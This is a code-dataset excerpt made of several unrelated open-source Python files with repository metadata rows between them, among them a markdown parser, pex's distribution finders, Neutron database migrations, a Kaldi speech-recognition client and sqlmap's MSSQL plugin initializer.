self.newInput("Polygon Indices List", "Polygon Indices", "polygonsIndices")
elif self.sourceType == "BMESH":
self.newInput("BMesh", "BMesh", "bm")
elif self.sourceType == "OBJECT":
self.newInput("Object", "Object", "object", defaultDrawType = "PROPERTY_ONLY")
self.newInput("Float", "Epsilon", "epsilon", hide = True, minValue = 0)
self.newOutput("BVHTree", "BVHTree", "bvhTree")
def draw(self, layout):
layout.prop(self, "sourceType", text = "Source")
def getExecutionFunctionName(self):
if self.sourceType == "MESH_DATA":
return "execute_Mesh"
elif self.sourceType == "BMESH":
return "execute_BMesh"
elif self.sourceType == "OBJECT":
return "execute_Object"
def execute_Mesh(self, vectorList, polygonsIndices, epsilon):
if len(polygonsIndices) == 0:
return self.getFallbackBVHTree()
if 0 <= polygonsIndices.getMinIndex() <= polygonsIndices.getMaxIndex() < len(vectorList):
return BVHTree.FromPolygons(vectorList, polygonsIndices, epsilon = max(epsilon, 0))
def execute_BMesh(self, bm, epsilon):
return BVHTree.FromBMesh(bm, epsilon = max(epsilon, 0))
def execute_Object(self, object, epsilon):
if object is None:
return self.getFallbackBVHTree()
if object.type != "MESH":
return self.getFallbackBVHTree()
mesh = object.data
vertices = mesh.an.getVertices()
vertices.transform(object.matrix_world)
polygons = mesh.an.getPolygonIndices()
return self.execute_Mesh(vertices, polygons, epsilon)
def getFallbackBVHTree(self):
return self.outputs[0].getDefaultValue()
| 37.363636
| 97
| 0.639497
|
acff5facc1dc95b709c68cb4336ee0f4eb77936c
| 323
|
py
|
Python
|
setup.py
|
pwoolcoc/fediplay
|
1be7fa445416438fc6229f683ef5e038e315d7b4
|
[
"MIT"
] | 1
|
2019-07-19T20:46:56.000Z
|
2019-07-19T20:46:56.000Z
|
setup.py
|
pwoolcoc/fediplay
|
1be7fa445416438fc6229f683ef5e038e315d7b4
|
[
"MIT"
] | null | null | null |
setup.py
|
pwoolcoc/fediplay
|
1be7fa445416438fc6229f683ef5e038e315d7b4
|
[
"MIT"
] | null | null | null |
from setuptools import setup
setup(
name='fediplay',
version='0.1',
py_modules=['fediplay'],
install_requires=[
'Mastodon.py',
'cssselect',
'lxml',
'youtube-dl'
],
entry_points={
'console_scripts': [
'fediplay = fediplay:main'
]
}
)
| 16.15
| 38
| 0.50774
|
acff5ffa5f9fdcfd256f3945df3032b88115d1dd
| 4,946
|
py
|
Python
|
marko/__init__.py
|
phtan/marko
|
d554ecd576b1cf26ded4d8fffa53945c2fa42e5c
|
[
"MIT"
] | null | null | null |
marko/__init__.py
|
phtan/marko
|
d554ecd576b1cf26ded4d8fffa53945c2fa42e5c
|
[
"MIT"
] | null | null | null |
marko/__init__.py
|
phtan/marko
|
d554ecd576b1cf26ded4d8fffa53945c2fa42e5c
|
[
"MIT"
] | null | null | null |
#! -*- coding: utf-8 -*-
"""
_ _ _ ___ _ _ ___
| \ / | /_\ | _ \ | |/ / / _ \
| |\/| | / _ \ | / | ' < | (_) |
|_| |_| /_/ \_\ |_|_\ |_|\_\ \___/
A markdown parser with high extensibility.
Licensed under MIT.
Created by Frost Ming<mianghong@gmail.com>
"""
from .html_renderer import HTMLRenderer
from .renderer import Renderer
from .parser import Parser
from .helpers import is_type_check, load_extension_object
from ._compat import string_types
if is_type_check():
from typing import Type, List, Any, Optional
from .block import Document
from .parser import ElementType
__version__ = "0.8.2"
class SetupDone(Exception):
def __str__(self):
return "Unable to register more extensions after setup done."
class Markdown(object):
"""The main class to convert markdown documents.
Attributes:
* parser: an instance of :class:`marko.parser.Parser`
* renderer: an instance of :class:`marko.renderer.Renderer`
:param parser: a subclass :class:`marko.parser.Parser`.
:param renderer: a subclass :class:`marko.renderer.Renderer`.
:param extensions: a list of extensions to register on the object.
See document of :meth:`Markdown.use()`.
"""
def __init__(self, parser=Parser, renderer=HTMLRenderer, extensions=None):
# type: (Type[Parser], Type[Renderer], Optional[Any]) -> None
assert issubclass(parser, Parser)
self._base_parser = parser
self._parser_mixins = [] # type: List[Any]
assert issubclass(renderer, Renderer)
self._base_renderer = renderer
self._renderer_mixins = [] # type: List[Any]
self._extra_elements = [] # type: List[ElementType]
self._setup_done = False
if extensions:
self.use(*extensions)
def use(self, *extensions): # type: (Any) -> None
"""Register extensions to Markdown object.
An extension should be either an object providing ``elements``, `parser_mixins``
, ``renderer_mixins`` or all attributes, or a string representing the
corresponding extension in ``marko.ext`` module.
:param \*extensions: extension object or string.
.. note:: Marko uses a mixin based extension system, the order of extensions
matters: An extension preceding in order will have higher priorty.
"""
if self._setup_done:
raise SetupDone()
for extension in extensions:
if isinstance(extension, string_types):
extension = load_extension_object(extension)()
self._parser_mixins = (
getattr(extension, "parser_mixins", []) + self._parser_mixins
)
self._renderer_mixins = (
getattr(extension, "renderer_mixins", []) + self._renderer_mixins
)
self._extra_elements.extend(getattr(extension, "elements", []))
def _setup_extensions(self): # type: () -> None
"""Install all extensions and set things up."""
if self._setup_done:
return
self.parser = type(
"MarkdownParser", tuple(self._parser_mixins) + (self._base_parser,), {}
)()
for e in self._extra_elements:
self.parser.add_element(e)
self.renderer = type(
"MarkdownRenderer",
tuple(self._renderer_mixins) + (self._base_renderer,),
{},
)()
self._setup_done = True
def convert(self, text): # type: (str) -> str
"""Parse and render the given text."""
return self.render(self.parse(text))
def __call__(self, text): # type: (str) -> str
return self.convert(text)
def parse(self, text): # type: (str) -> Document
"""Call ``self.parser.parse(text)``.
Override this to preprocess text or handle parsed result.
"""
self._setup_extensions()
return self.parser.parse(text)
def render(self, parsed): # type: (Document) -> str
"""Call ``self.renderer.render(text)``.
Override this to handle parsed result.
"""
self.renderer.root_node = parsed
with self.renderer as r:
return r.render(parsed)
# Inner instance, use the bare convert/parse/render function instead
_markdown = Markdown()
def convert(text): # type: (str) -> str
"""Parse and render the given text.
:param text: text to convert.
:returns: The rendered result.
"""
return _markdown.convert(text)
def parse(text): # type: (str) -> Document
"""Parse the text to a structured data object.
:param text: text to parse.
:returns: the parsed object
"""
return _markdown.parse(text)
def render(parsed): # type: (Document) -> str
"""Render the parsed object to text.
:param parsed: the parsed object
:returns: the rendered result.
"""
return _markdown.render(parsed)
| 31.503185
| 88
| 0.615649
|
acff60b89814410e5ac39648637c98de9123f2d4
| 7,712
|
py
|
Python
|
pex/finders.py
|
zyga/pex
|
1df0cd2971aae60f0d48118e7719ab5def7861b2
|
[
"Apache-2.0"
] | 1
|
2019-06-16T07:05:33.000Z
|
2019-06-16T07:05:33.000Z
|
pex/finders.py
|
zyga/pex
|
1df0cd2971aae60f0d48118e7719ab5def7861b2
|
[
"Apache-2.0"
] | null | null | null |
pex/finders.py
|
zyga/pex
|
1df0cd2971aae60f0d48118e7719ab5def7861b2
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
"""The finders we wish we had in setuptools.
As of setuptools 3.3, the only finder for zip-based distributions is for eggs. The path-based
finder only searches paths ending in .egg and not in .whl (zipped or unzipped.)
pex.finders augments pkg_resources with additional finders to achieve functional
parity between wheels and eggs in terms of findability with find_distributions.
To use: ::
>>> from pex.finders import register_finders
>>> register_finders()
"""
import os
import pkgutil
import sys
import zipimport
import pkg_resources
if sys.version_info >= (3, 3) and sys.implementation.name == "cpython":
import importlib._bootstrap as importlib_bootstrap
else:
importlib_bootstrap = None
class ChainedFinder(object):
"""A utility to chain together multiple pkg_resources finders."""
@classmethod
def of(cls, *chained_finder_or_finder):
finders = []
for finder in chained_finder_or_finder:
if isinstance(finder, cls):
finders.extend(finder.finders)
else:
finders.append(finder)
return cls(finders)
def __init__(self, finders):
self.finders = finders
def __call__(self, importer, path_item, only=False):
for finder in self.finders:
for dist in finder(importer, path_item, only=only):
yield dist
def __eq__(self, other):
if not isinstance(other, ChainedFinder):
return False
return self.finders == other.finders
# The following methods are somewhat dangerous as pkg_resources._distribution_finders is not an
# exposed API. As it stands, pkg_resources doesn't provide an API to chain multiple distribution
# finders together. This is probably possible using importlib but that does us no good as the
# importlib machinery supporting this is only available in Python >= 3.1.
def _get_finder(importer):
if not hasattr(pkg_resources, '_distribution_finders'):
return None
return pkg_resources._distribution_finders.get(importer)
def _add_finder(importer, finder):
"""Register a new pkg_resources path finder that does not replace the existing finder."""
existing_finder = _get_finder(importer)
if not existing_finder:
pkg_resources.register_finder(importer, finder)
else:
pkg_resources.register_finder(importer, ChainedFinder.of(existing_finder, finder))
def _remove_finder(importer, finder):
"""Remove an existing finder from pkg_resources."""
existing_finder = _get_finder(importer)
if not existing_finder:
return
if isinstance(existing_finder, ChainedFinder):
try:
existing_finder.finders.remove(finder)
except ValueError:
return
if len(existing_finder.finders) == 1:
pkg_resources.register_finder(importer, existing_finder.finders[0])
elif len(existing_finder.finders) == 0:
pkg_resources.register_finder(importer, pkg_resources.find_nothing)
else:
pkg_resources.register_finder(importer, pkg_resources.find_nothing)
class WheelMetadata(pkg_resources.EggMetadata):
"""Metadata provider for zipped wheels."""
@classmethod
def _split_wheelname(cls, wheelname):
split_wheelname = wheelname.split('-')
return '-'.join(split_wheelname[:-3])
def _setup_prefix(self):
path = self.module_path
old = None
while path != old:
if path.lower().endswith('.whl'):
self.egg_name = os.path.basename(path)
# TODO(wickman) Test the regression where we have both upper and lower cased package
# names.
self.egg_info = os.path.join(path, '%s.dist-info' % self._split_wheelname(self.egg_name))
self.egg_root = path
break
old = path
path, base = os.path.split(path)
# See https://bitbucket.org/tarek/distribute/issue/274
class FixedEggMetadata(pkg_resources.EggMetadata):
"""An EggMetadata provider that has functional parity with the disk-based provider."""
@classmethod
def normalized_elements(cls, path):
path_split = path.split('/')
while path_split[-1] in ('', '.'):
path_split.pop(-1)
return path_split
def _fn(self, base, resource_name):
# super() does not work here as EggMetadata is an old-style class.
original_fn = pkg_resources.EggMetadata._fn(self, base, resource_name)
return '/'.join(self.normalized_elements(original_fn))
def _zipinfo_name(self, fspath):
fspath = self.normalized_elements(fspath)
zip_pre = self.normalized_elements(self.zip_pre)
if fspath[:len(zip_pre)] == zip_pre:
return '/'.join(fspath[len(zip_pre):])
assert "%s is not a subpath of %s" % (fspath, self.zip_pre)
def wheel_from_metadata(location, metadata):
if not metadata.has_metadata(pkg_resources.DistInfoDistribution.PKG_INFO):
return None
from email.parser import Parser
pkg_info = Parser().parsestr(metadata.get_metadata(pkg_resources.DistInfoDistribution.PKG_INFO))
return pkg_resources.DistInfoDistribution(
location=location,
metadata=metadata,
# TODO(wickman) Is this necessary or will they get picked up correctly?
project_name=pkg_info.get('Name'),
version=pkg_info.get('Version'),
platform=None)
def find_wheels_on_path(importer, path_item, only=False):
if not os.path.isdir(path_item) or not os.access(path_item, os.R_OK):
return
if not only:
for entry in os.listdir(path_item):
if entry.lower().endswith('.whl'):
for dist in pkg_resources.find_distributions(os.path.join(path_item, entry)):
yield dist
def find_eggs_in_zip(importer, path_item, only=False):
if importer.archive.endswith('.whl'):
# Defer to wheel importer
return
metadata = FixedEggMetadata(importer)
if metadata.has_metadata('PKG-INFO'):
yield pkg_resources.Distribution.from_filename(path_item, metadata=metadata)
if only:
return # don't yield nested distros
for subitem in metadata.resource_listdir('/'):
if subitem.endswith('.egg'):
subpath = os.path.join(path_item, subitem)
for dist in find_eggs_in_zip(zipimport.zipimporter(subpath), subpath):
yield dist
def find_wheels_in_zip(importer, path_item, only=False):
metadata = WheelMetadata(importer)
dist = wheel_from_metadata(path_item, metadata)
if dist:
yield dist
__PREVIOUS_FINDER = None
def register_finders():
"""Register finders necessary for PEX to function properly."""
# If the previous finder is set, then we've already monkeypatched, so skip.
global __PREVIOUS_FINDER
if __PREVIOUS_FINDER:
return
# save previous finder so that it can be restored
previous_finder = _get_finder(zipimport.zipimporter)
assert previous_finder, 'This appears to be using an incompatible setuptools.'
# replace the zip finder with our own implementation of find_eggs_in_zip which uses the correct
# metadata handler, in addition to find_wheels_in_zip
pkg_resources.register_finder(
zipimport.zipimporter, ChainedFinder.of(find_eggs_in_zip, find_wheels_in_zip))
# append the wheel finder
_add_finder(pkgutil.ImpImporter, find_wheels_on_path)
if importlib_bootstrap is not None:
_add_finder(importlib_bootstrap.FileFinder, find_wheels_on_path)
__PREVIOUS_FINDER = previous_finder
def unregister_finders():
"""Unregister finders necessary for PEX to function properly."""
global __PREVIOUS_FINDER
if not __PREVIOUS_FINDER:
return
pkg_resources.register_finder(zipimport.zipimporter, __PREVIOUS_FINDER)
_remove_finder(pkgutil.ImpImporter, find_wheels_on_path)
if importlib_bootstrap is not None:
_remove_finder(importlib_bootstrap.FileFinder, find_wheels_on_path)
__PREVIOUS_FINDER = None
| 32.540084
| 98
| 0.74209
|
acff61042be530f5cd425b681e7c51b94fbf048c
| 4,391
|
py
|
Python
|
neutron/db/migration/alembic_migrations/nec_init_ops.py
|
congnt95/neutron
|
6a73a362c5ff5b7c28c15a49f47a9900c0d2b4e1
|
[
"Apache-2.0"
] | 1,080
|
2015-01-04T08:35:00.000Z
|
2022-03-27T09:15:52.000Z
|
neutron/db/migration/alembic_migrations/nec_init_ops.py
|
congnt95/neutron
|
6a73a362c5ff5b7c28c15a49f47a9900c0d2b4e1
|
[
"Apache-2.0"
] | 24
|
2015-02-21T01:48:28.000Z
|
2021-11-26T02:38:56.000Z
|
neutron/db/migration/alembic_migrations/nec_init_ops.py
|
congnt95/neutron
|
6a73a362c5ff5b7c28c15a49f47a9900c0d2b4e1
|
[
"Apache-2.0"
] | 1,241
|
2015-01-02T10:47:10.000Z
|
2022-03-27T09:42:23.000Z
|
# Copyright 2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Initial operations for NEC plugin
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_table(
'ofcportmappings',
sa.Column('ofc_id', sa.String(length=255), nullable=False),
sa.Column('neutron_id', sa.String(length=36), nullable=False),
sa.PrimaryKeyConstraint('neutron_id'),
sa.UniqueConstraint('ofc_id'))
op.create_table(
'ofcroutermappings',
sa.Column('ofc_id', sa.String(length=255), nullable=False),
sa.Column('neutron_id', sa.String(length=36), nullable=False),
sa.PrimaryKeyConstraint('neutron_id'),
sa.UniqueConstraint('ofc_id'))
op.create_table(
'routerproviders',
sa.Column('provider', sa.String(length=255), nullable=True),
sa.Column('router_id', sa.String(length=36), nullable=False),
sa.ForeignKeyConstraint(['router_id'], ['routers.id'],
ondelete='CASCADE'),
sa.PrimaryKeyConstraint('router_id'))
op.create_table(
'ofctenantmappings',
sa.Column('ofc_id', sa.String(length=255), nullable=False),
sa.Column('neutron_id', sa.String(length=36), nullable=False),
sa.PrimaryKeyConstraint('neutron_id'),
sa.UniqueConstraint('ofc_id'))
op.create_table(
'ofcfiltermappings',
sa.Column('ofc_id', sa.String(length=255), nullable=False),
sa.Column('neutron_id', sa.String(length=36), nullable=False),
sa.PrimaryKeyConstraint('neutron_id'),
sa.UniqueConstraint('ofc_id'))
op.create_table(
'ofcnetworkmappings',
sa.Column('ofc_id', sa.String(length=255), nullable=False),
sa.Column('neutron_id', sa.String(length=36), nullable=False),
sa.PrimaryKeyConstraint('neutron_id'),
sa.UniqueConstraint('ofc_id'))
op.create_table(
'packetfilters',
sa.Column('tenant_id', sa.String(length=255), nullable=True,
index=True),
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('name', sa.String(length=255), nullable=True),
sa.Column('network_id', sa.String(length=36), nullable=False),
sa.Column('priority', sa.Integer(), nullable=False),
sa.Column('action', sa.String(length=16), nullable=False),
sa.Column('in_port', sa.String(length=36), nullable=True),
sa.Column('src_mac', sa.String(length=32), nullable=False),
sa.Column('dst_mac', sa.String(length=32), nullable=False),
sa.Column('eth_type', sa.Integer(), nullable=False),
sa.Column('src_cidr', sa.String(length=64), nullable=False),
sa.Column('dst_cidr', sa.String(length=64), nullable=False),
sa.Column('protocol', sa.String(length=16), nullable=False),
sa.Column('src_port', sa.Integer(), nullable=False),
sa.Column('dst_port', sa.Integer(), nullable=False),
sa.Column('admin_state_up', sa.Boolean(), nullable=False),
sa.Column('status', sa.String(length=16), nullable=False),
sa.ForeignKeyConstraint(['network_id'], ['networks.id'],
ondelete='CASCADE'),
sa.ForeignKeyConstraint(['in_port'], ['ports.id'],
ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id'))
op.create_table(
'portinfos',
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('datapath_id', sa.String(length=36), nullable=False),
sa.Column('port_no', sa.Integer(), nullable=False),
sa.Column('vlan_id', sa.Integer(), nullable=False),
sa.Column('mac', sa.String(length=32), nullable=False),
sa.ForeignKeyConstraint(['id'], ['ports.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id'))
| 43.04902
| 78
| 0.638579
|
acff61d6af70a8f8946a1eb95ef0fdd7125e29c1
| 700
|
py
|
Python
|
backend/flask-api/migrations/versions/f172c6d30249_.py
|
lucasbibianot/inova-cnj-time16
|
e621d7027bd462d348e233ffd6ed88648c53704b
|
[
"Apache-2.0"
] | null | null | null |
backend/flask-api/migrations/versions/f172c6d30249_.py
|
lucasbibianot/inova-cnj-time16
|
e621d7027bd462d348e233ffd6ed88648c53704b
|
[
"Apache-2.0"
] | null | null | null |
backend/flask-api/migrations/versions/f172c6d30249_.py
|
lucasbibianot/inova-cnj-time16
|
e621d7027bd462d348e233ffd6ed88648c53704b
|
[
"Apache-2.0"
] | 2
|
2020-10-19T22:03:31.000Z
|
2020-11-29T21:22:33.000Z
|
"""Ajustando campos not null da tb_hist_situacao para null
Revision ID: f172c6d30249
Revises: 2373796f9e26
Create Date: 2020-10-18 17:18:24.491127
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'f172c6d30249'
down_revision = '2373796f9e26'
branch_labels = None
depends_on = None
def upgrade():
op.execute("alter table tb_hist_situacao drop column id_situacao_origem")
op.execute("alter table tb_hist_situacao drop column id_evento")
op.execute("alter table tb_hist_situacao add column id_situacao_origem int4 null")
op.execute("alter table tb_hist_situacao add column id_evento int4 null")
def downgrade():
pass
| 25
| 86
| 0.771429
|
acff626288ec9c5d52921ba97d6f7cdab95e2b1b
| 9,066
|
py
|
Python
|
python/audio_client.py
|
bmilde/ambientsearch
|
74bf83a313e19da54a4e44158063041f981424c9
|
[
"Apache-2.0"
] | 20
|
2016-04-30T11:24:45.000Z
|
2021-11-09T10:39:25.000Z
|
python/audio_client.py
|
bmilde/ambientsearch
|
74bf83a313e19da54a4e44158063041f981424c9
|
[
"Apache-2.0"
] | 1
|
2020-09-23T13:36:58.000Z
|
2020-09-23T13:36:58.000Z
|
python/audio_client.py
|
bmilde/ambientsearch
|
74bf83a313e19da54a4e44158063041f981424c9
|
[
"Apache-2.0"
] | 8
|
2015-10-07T13:40:36.000Z
|
2019-08-07T06:45:24.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Benjamin Milde and Jonas Wacker'
import argparse
from ws4py.client.threadedclient import WebSocketClient
import threading
import sys
import urllib
import Queue
import json
import time
import traceback
import os
from mutagen.mp3 import MP3
from bridge import KeywordClient
std_speaker = "You"
def rate_limited(max_per_second):
min_interval = 1.0 / float(max_per_second)
def decorate(func):
last_time_called = [0.0]
def rate_limited_function(*args, **kargs):
elapsed = time.clock() - last_time_called[0]
left_to_wait = min_interval - elapsed
if left_to_wait > 0:
time.sleep(left_to_wait)
ret = func(*args, **kargs)
last_time_called[0] = time.clock()
return ret
return rate_limited_function
return decorate
# Returns an audio file's bitrate and length in seconds if file is in mp3-format.
def get_audio_meta_data(path):
file_extension = os.path.splitext(path)[1] if (isinstance(path, str) and os.path.isfile(path)) else 'none'
meta_data = {'bitrate': 32000 * 8, 'length': 0}
if file_extension == '.mp3':
audio = MP3(path)
meta_data['bitrate'] = audio.info.bitrate
meta_data['length'] = audio.info.length
return meta_data
class KaldiClient(WebSocketClient):
def __init__(self, filename, url, protocols=None, extensions=None, heartbeat_freq=None, byterate=32000,
save_adaptation_state_filename=None, send_adaptation_state_filename=None, keyword_server_url='',
max_sentences=0):
super(KaldiClient, self).__init__(url, protocols, extensions, heartbeat_freq)
self.final_hyps = []
self.fn = filename
self.byterate = byterate
self.final_hyp_queue = Queue.Queue()
self.save_adaptation_state_filename = save_adaptation_state_filename
self.send_adaptation_state_filename = send_adaptation_state_filename
self.keyword_client = KeywordClient(keyword_server_url)
self.keyword_client.reset()
self.send_to_keywordserver = not (keyword_server_url == '')
if self.send_to_keywordserver:
self.keyword_client.addUtterance('', 'You')
self.last_hyp = ''
self.max_sentences = max_sentences
@rate_limited(4)
def send_data(self, data):
self.send(data, binary=True)
def opened(self):
# print "Socket opened!"
def send_data_to_ws():
f = open(self.fn, "rb")
if self.send_adaptation_state_filename is not None:
print >> sys.stderr, "Sending adaptation state from %s" % self.send_adaptation_state_filename
try:
adaptation_state_props = json.load(open(self.send_adaptation_state_filename, "r"))
self.send(json.dumps(dict(adaptation_state=adaptation_state_props)))
except:
e = sys.exc_info()[0]
print >> sys.stderr, "Failed to send adaptation state: ", e
for block in iter(lambda: f.read(self.byterate / 4), ""):
if self.maximum_sentences_reached():
break
self.send_data(block)
print >> sys.stderr, "Audio sent, now sending EOS"
self.send("EOS")
t = threading.Thread(target=send_data_to_ws)
t.start()
# received decoding message from upstream Kaldi server
def received_message(self, m):
if self.maximum_sentences_reached():
return
try:
response = json.loads(str(m))
# print >> sys.stderr, "RESPONSE:", response
# print >> sys.stderr, "JSON was:", m
if response['status'] == 0:
if 'result' in response:
trans = response['result']['hypotheses'][0]['transcript']
if response['result']['final']:
if trans not in ['a.', 'I.', 'i.', 'the.', 'but.', 'one.', 'it.', 'she.']:
self.final_hyps.append(trans)
if self.send_to_keywordserver:
self.keyword_client.replaceLastUtterance(self.last_hyp, trans, std_speaker)
self.keyword_client.completeUtterance(trans, std_speaker)
self.keyword_client.addUtterance('', std_speaker)
self.last_hyp = ''
complete_transcript = '\n'.join(sentence[:-1] for sentence in self.final_hyps)
print u'\r\033[K', trans.replace(u'\n', u'\\n')
else:
if self.send_to_keywordserver:
self.keyword_client.replaceLastUtterance(self.last_hyp, trans, std_speaker)
self.last_hyp = trans
print_trans = trans.replace(u'\n', u'\\n')
print u'\r\033[K', print_trans
if 'adaptation_state' in response:
if self.save_adaptation_state_filename:
print u'Saving adaptation state to %s' % self.save_adaptation_state_filename
with open(self.save_adaptation_state_filename, 'w') as f:
f.write(json.dumps(response['adaptation_state']))
else:
print u'Received error from server (status %d)' % response['status']
if 'message' in response:
print 'Error message:', response['message']
except Exception:
print 'Exception in received_message'
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback,
limit=10, file=sys.stdout)
def get_full_hyp(self, timeout=60):
return self.final_hyp_queue.get(timeout)
# Returns True if the maximum number of sentences defined by the user have been transcribed.
def maximum_sentences_reached(self):
return self.max_sentences != 0 and len(self.final_hyps) >= self.max_sentences
def closed(self, code, reason=None):
# print "Websocket closed() called"
# print >> sys.stderr
self.final_hyp_queue.put(" ".join(self.final_hyps))
def connect_ws(args):
content_type = args.content_type
if content_type == '' and args.audiofile.endswith(".raw"):
content_type = "audio/x-raw, layout=(string)interleaved, rate=(int)%d, format=(string)S16LE, channels=(int)1"\
% (args.rate / 2)
if args.rate == 0:
meta_data = get_audio_meta_data(args.audiofile)
args.rate = meta_data['bitrate'] / 8
print "No Bitrate provided. Setting Bitrate to: " + str(args.rate)
try:
ws = KaldiClient(args.audiofile, args.uri + '?%s' % (urllib.urlencode([("content-type", content_type)])),
byterate=args.rate, save_adaptation_state_filename=args.save_adaptation_state,
send_adaptation_state_filename=args.send_adaptation_state,
keyword_server_url=args.ambient_uri, max_sentences=args.count)
ws.connect()
while not ws.maximum_sentences_reached():
time.sleep(1)
except KeyboardInterrupt:
ws.close()
result = ws.get_full_hyp()
print result.encode('utf-8')
def main():
parser = argparse.ArgumentParser(description='Command line client for kaldigstserver')
parser.add_argument('-u', '--uri', default="ws://localhost:8100/client/ws/speech", dest="uri",
help="Server websocket URI")
parser.add_argument('-a', '--ambient-uri', default='http://localhost:5000/', dest='ambient_uri',
help='Ambient server websocket URI')
parser.add_argument('-r', '--rate', default=0, dest="rate", type=int,
help="Rate in bytes/sec at which audio should be sent to the server."
"NB! For raw 16-bit audio it must be 2*samplerate!")
parser.add_argument('-n', '--sentence-number', default=0, dest="count", type=int,
help="Maximum number of sentences to transcribe.")
parser.add_argument('--save-adaptation-state', help="Save adaptation state to file")
parser.add_argument('--send-adaptation-state', help="Send adaptation state from file")
parser.add_argument('--content-type', default='',
help="Use the specified content type (empty by default,"
"for raw files the default is audio/x-raw, layout=(string)interleaved,"
"rate=(int)<rate>, format=(string)S16LE, channels=(int)1")
parser.add_argument('audiofile', help="Audio file to be sent to the server")
args = parser.parse_args()
return args
if __name__ == "__main__":
args = main()
connect_ws(args)
| 42.167442
| 118
| 0.599713
|
acff62b99033bb54d9e458300b8373a551090c71
| 1,076
|
py
|
Python
|
Toolz/sqlmap/plugins/dbms/mssqlserver/__init__.py
|
thezakman/CTF-Toolz
|
b369246ea6766165cce0852e537fb6a0c970869b
|
[
"Unlicense"
] | 71
|
2019-02-02T11:38:46.000Z
|
2022-03-31T14:08:27.000Z
|
tools/sqlmap/plugins/dbms/mssqlserver/__init__.py
|
sravani-m/Web-Application-Security-Framework
|
d9f71538f5cba6fe1d8eabcb26c557565472f6a6
|
[
"MIT"
] | null | null | null |
tools/sqlmap/plugins/dbms/mssqlserver/__init__.py
|
sravani-m/Web-Application-Security-Framework
|
d9f71538f5cba6fe1d8eabcb26c557565472f6a6
|
[
"MIT"
] | 15
|
2019-08-07T06:32:04.000Z
|
2022-03-09T12:48:20.000Z
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.enums import DBMS
from lib.core.settings import MSSQL_SYSTEM_DBS
from lib.core.unescaper import unescaper
from plugins.dbms.mssqlserver.enumeration import Enumeration
from plugins.dbms.mssqlserver.filesystem import Filesystem
from plugins.dbms.mssqlserver.fingerprint import Fingerprint
from plugins.dbms.mssqlserver.syntax import Syntax
from plugins.dbms.mssqlserver.takeover import Takeover
from plugins.generic.misc import Miscellaneous
class MSSQLServerMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
"""
This class defines Microsoft SQL Server methods
"""
def __init__(self):
self.excludeDbsList = MSSQL_SYSTEM_DBS
Syntax.__init__(self)
Fingerprint.__init__(self)
Enumeration.__init__(self)
Filesystem.__init__(self)
Miscellaneous.__init__(self)
Takeover.__init__(self)
unescaper[DBMS.MSSQL] = Syntax.escape
| 31.647059
| 92
| 0.76487
|
acff630be4085958761468db65360904aa1355d7
| 3,536
|
py
|
Python
|
psana/psana/graphqt/H5VMain.py
|
valmar/lcls2
|
1c24da076a8cd252cf6601e125dd721fd2004f2a
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
psana/psana/graphqt/H5VMain.py
|
valmar/lcls2
|
1c24da076a8cd252cf6601e125dd721fd2004f2a
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
psana/psana/graphqt/H5VMain.py
|
valmar/lcls2
|
1c24da076a8cd252cf6601e125dd721fd2004f2a
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
"""Class :py:class:`H5VMain` is a QWidget for main window of hdf5viewer
========================================================================
Usage ::
# Run test: python lcls2/psana/psana/graphqt/H5VMain.py
from psana.graphqt.H5VMain import H5VMain
See method: hdf5explorer
Created on 2019-11-12 by Mikhail Dubrovin
"""
import logging
#logger = logging.getLogger(__name__)
import sys
from PyQt5.QtWidgets import QApplication, QWidget, QHBoxLayout, QVBoxLayout, QSplitter, QTextEdit
from psana.graphqt.QWLoggerStd import QWLoggerStd
from psana.graphqt.H5VControl import H5VControl
from psana.graphqt.H5VQWTree import Qt, H5VQWTree
from psana.graphqt.CMConfigParameters import cp
from psana.pyalgos.generic.Utils import print_kwargs, is_in_command_line
from psana.detector.RepoManager import RepoManager
class H5VMain(QWidget):
def __init__(self, **kwargs):
QWidget.__init__(self, parent=None)
cp.h5vmain = self
self.proc_kwargs(**kwargs)
logdir = cp.log_prefix.value()
kwargs['parent'] = self
self.wlog = kwargs.get('wlog', cp.wlog)
if self.wlog is None: self.wlog = QWLoggerStd(cp, show_buttons=False)
self.wtree = H5VQWTree(**kwargs)
self.wctrl = H5VControl(**kwargs)
self.wtree.wctrl = self.wctrl
self.hspl = QSplitter(Qt.Horizontal)
self.hspl.addWidget(self.wtree)
if cp.wlog is None: self.hspl.addWidget(self.wlog)
self.vbox = QVBoxLayout()
self.vbox.addWidget(self.wctrl)
self.vbox.addWidget(self.hspl)
self.setLayout(self.vbox)
self.set_style()
self.set_tool_tips()
if kwargs.get('rec_at_start', False):
RepoManager(logdir, dettype=None).\
save_record_at_start(sys.argv[0].rsplit('/')[-1])
#self.connect_signals_to_slots()
def proc_kwargs(self, **kwargs):
print_kwargs(kwargs)
loglevel = kwargs.get('loglevel', 'DEBUG').upper()
logdir = kwargs.get('logdir', './')
savelog = kwargs.get('savelog', False)
if is_in_command_line('-l', '--loglevel'): cp.log_level.setValue(loglevel)
cp.log_prefix.setValue(logdir)
cp.save_log_at_exit.setValue(savelog)
def connect_signals_to_slots(self):
pass
#self.connect(self.wbut.but_reset, QtCore.SIGNAL('clicked()'), self.on_but_reset)
